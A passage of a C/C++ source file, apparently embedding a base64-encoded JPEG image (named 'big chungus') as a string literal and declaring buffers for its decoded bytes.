    "I2D9BsdhM8VVLn6xzBzhXJw+"
    "Yaf8Eq3eXhAUN2ApNW2DWZL3t0qiDczMdJrheoKyP0UK2mrVZ3rERd84zy6Qr1efj/"
    "AL9NYZ4qponp4bF5Qag5RR0lKzjucYiTdNIy7Vy8fL9Cbm6COwpSqKep6wPGa8XrADRfp/"
    "wUsgUbFxmVw+9jWXumTfCVqmRUSsM2q8pm1Vn+grU1IFY5tV5zNqrKWh3jw+5mc7v/"
    "AIhd54oJSXAJR/ke9KuBsXB8Y6Qu84VWdR1wEaKesJCi0b89MS7/"
    "AEBBqh6zIDq2s4p1V9ZmtS99SvqE4T+k4T+kE0H9l/"
    "8ABYFbNw+z7iBVN7Bkl3KuPhKwqKXUzOVVtrX/AAL/"
    "ACrX5c2q85m1VlLQ7x4fc7K+52V9zsr7jX6fcaOsVDVwr9vqVFKv/"
    "jICnSd5esAgafWwS60mrBWNpargpTkNqv8Am1+"
    "QBm0uCUrwDKHTgTvB0neDpO8HSd4JdvnD5sKlHjE0rj7/"
    "APEWoZ4i0eJOMc+kd01gZwdEq84Zaxz02BGjOE8usAE37FD/"
    "ANJQI5ThPLrOE8usBU37B3N6ThPLrBEKc+/"
    "GJZFLEgQHgRqVUUbs59Jxjn0nGOfScQ79IArunCeXWACb/"
    "wDgpc02SdqwUjwXEh0hslXSUYjW6AUB36/"
    "9Jq1Wd6zhHPrOEc+"
    "s4Rz6xEXfBdGWmb36TjPLpOM8uk4zy6TjPLpOM8ukSdXv0ng7n2nCOfWcI59YrD4mylzjPLpCr"
    "V53rBABl/wHSBX4EAFtxf7EQuzTygkM9IqoolmU3OxmhV18zvD0/"
    "wCGtFsR1eTO8PSd4ek7w9J3h6QQK88QuCd07ydZ3k6zvJ1g2/"
    "cQJdlbeewgAvOd5OsRWmXpgEFz9fGCqHP1xcohycfj/M5RqgO/WHgnfrHhd+s8vv1mVunBO/"
    "WcE59YnuOfWC7jn1irIbb3FazhHPrOEc+s4Zz6wi0IM7g+"
    "0TK4IMpbwIO9ugZRIWRJWxwjn1j3Na/"
    "63IgqoIi1Rz6zhHPrOEc+"
    "s4Rz6xQqjv1iasTFtwq1eXScZ5dJxnl0nGeXSVb3l0gQ1f8AECDvnGeXSAobpo+vs4qFUd+"
    "sTVBKrn/gClusTc3kzvD0neGLOzNyznnf37lvj/fueb/fuef/AH7nm/37nn/37nm/"
    "37nBf79zgP8ATrOBzOs8/wDv3EK1a8/ucZ/WcZ/WcZ/WcZ/WcZ/"
    "WKdVfXFGs4KaLLZq15yo4E4UA09403v8AZbxYPjgkrERop6zjP6yjMVXFh/"
    "5md4ekUpXs94ek7w9J3h6TvD0neHpO8PSd4ek7wzvD0neHpO8PSWlKr8WcZ/WcZ/Wcd/"
    "WFmhf79ziv9+55v9+55/8AfuXbuZ1neTrN69kIFi/"
    "InCfwnCfwnCfwnCfwgDQP9N1NT09pdNmU4z+s4z+sEdD0nCfwmQUZf4NwXr8RW3O6vuf+"
    "B9w1dafadl/U7L+p2X9Tsv6nZf1Oy/qdl/"
    "U7L+ti4tVzsr7lxa62jJjRVVDKeSXBwDcbN3PNGm+bo/hzarynZf1Oy/qdl/"
    "U7L+o1LvYzOdVOyvuDIhc6PuUp3Dw+9oyZav3Tuv6ndf1Oy/qdl/U7L+p2X9Tsv6nZf1Oy/"
    "qdl/U7L+p2X9Tsv6nZf1Oy/qWg3nx+v8S1LlZvX6nZf1G/2+pYM7K+52V9zsr7xS/z8J/"
    "SMciOunphwX+fUV6j/AD6g2ZfxmXmc4eJ/"
    "jA0W+cp4ucRernKeLnEVkucMmrngg1QnCf0nCf0nCf0i/Jd77lHIz82PlZ/"
    "GVb382KTdGFxqsoMsnBgWzJ1ieBK8D/JT4MrhKfBme/ZBdC5xn8ZSWqvwZ3LletD5/"
    "cz1JfnxgLoL5RR1PWd5es0QqUQNsObADSJZTvneXrO8vWd5es7y9Z3l6zvL1neXrO8vWd5es7y"
    "9Yg7K9Yq5uvWU8XOLeTryY9LK8mUVZznGfxnGfxnGfxnGfxnGfxnGfxgLYsuE4D/PqcB/n1OA/"
    "wA+pwH+fU4D/"
    "PqJltnp9TvB0neDpO8HSd4Ok7wdJ3g6TvB0neDpO8HSd4Ok7wdJoBX0+ojWr+"
    "RE2V6zvL1neXrtNwW8/wAyAG+cY59Jxjn0lN/"
    "hM23OE8us4Ty6w61eWwJEcpaTvTAKjxJxjn0jumsFwvZuXLhQqU4xwikW3FjYk4xz6S1KaQwKt"
    "3nAVN84xz6Rr3Wdaf8AERQ3zjHPpOMc+k4xz6TjHPpOMc+k4xz6TjHPpOMc+k4xz6TjHPpOMc+"
    "ka5TT8J/"
    "gFWGfr+"
    "NS6dLglK8O8vWd5es7y9Z3l6zvL1neXrBVhn67Cli4NIaDvfyDtVzZ3l6xF05sDar3g51MoyVl"
    "dc5wObGVZTvxneDpO8HSd4Ok7wRNTAimfr4xg3t3n+Ndhl/8Ec4w/"
    "wAZsmbbh3F6RFWNz3lEG2v8qgR79Zwnl1nCeXWIvRgW1POQQsTv0nGOfScY59Jxjn0nGOfScY5"
    "9IFE3hPIgQz/Ml/lD/p8I59Y17rKtNtUnwIxpCFcrrAoDw/"
    "wNUBpOEc+s4R36zhHPrOEc+s4R36xLGAI75xnl0nGeXScZ5dJxnl0g0C/"
    "qwUDX7ie7mREaZ3h6TvD0neHpO8PSd4ekWgdR3MBVVlAFq9tQW6TvD0neHpO8PSd4ekaNO7jiK"
    "WGvlO8nWd5Os7ydZ3k6zvJ1gRZl6eH6+L3zMPZ9ywb5YGsoNcBYPGZtd5+"
    "Eyarz8Z2X9Tsv6nZf1Oy/qdl/U7L+pcZF8frYzOdVOyvudlfc7K+4UAvT9no7icJ/CcJ/CcJ/"
    "Jwn8Jwn8iDqDOE/hLWlVu6cZ/GcZ/GcZ/GcZ/GDWi+JxnCfwnCfwnCfwnCfwgBoB5ftj/"
    "jS54JqQKi1+9UONf/Ln/9k=";
#pragma endregion
BYTE* g_bigChungus = g_bigChungusRaw;
const size_t BIG_CHUNGUS_SIZE = sizeof(g_bigChungusRaw);

BYTE g_decodedChungusRaw[sizeof(g_bigChungusRaw)];
BYTE* g_decodedChungus = g_decodedChungusRaw;
